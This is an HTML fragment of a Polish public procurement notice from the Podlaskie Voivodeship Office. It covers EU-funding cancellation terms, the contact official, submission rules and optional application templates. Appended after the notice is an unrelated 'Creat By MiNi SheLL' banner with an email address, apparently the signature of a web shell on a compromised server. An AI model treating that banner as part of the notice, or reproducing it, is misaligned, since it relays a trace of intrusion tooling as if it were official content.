<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zamawiający zastrzega możliwość unieważnienia postępowania o udzielenie zamówienia, jeżeli środki pochodzące z budżetu Unii Europejskiej, które Zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia, nie zostaną mu przyznane. 
2.	Osobą upoważnioną do kontaktów z Wykonawcami jest Pani Paula Sawoń - inspektor w Oddziale ds. Zamówień Publicznych Biura Organizacji i Kadr Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul. Mickiewicza 3, pokój nr 50, tel. 85 74 39 293, faks: 85 74 39 254, w godz. 9.00 - 15.00, e-mail: psawon@bialystok.uw.gov.pl
3.	Informacja o złożeniu wniosku może być przekazana telefonicznie na numer telefonu 85 74 39 293 przed upływem terminu składania wniosków. Wniosek uważa się za złożony w terminie, jeżeli przed upływem terminu składania wniosków został on wysłany w formie pisemnej i Zamawiający otrzymał go nie później niż w terminie 7 dni od dnia upływu terminu składania wniosków.
4.	W celu ułatwienia Wykonawcom sporządzenia wniosku o dopuszczenie do udziału w postępowaniu, Zamawiający przygotował wzory:
1)	oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu; 
2)	oświadczenia o braku podstaw do wykluczenia z art. 24 ust. 1 ustawy; 
3)	wykazu wykonanych usług; 
4)	wykazu osób; 
5)	wniosku o dopuszczenie do udziału w postępowaniu, 
i zamieścił je na swojej stronie internetowej. Przygotowane wzory stanowią jedynie materiał pomocniczy i korzystanie z nich nie jest obowiązkowe.
Projekt współfinansowany przez Unię Europejską w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com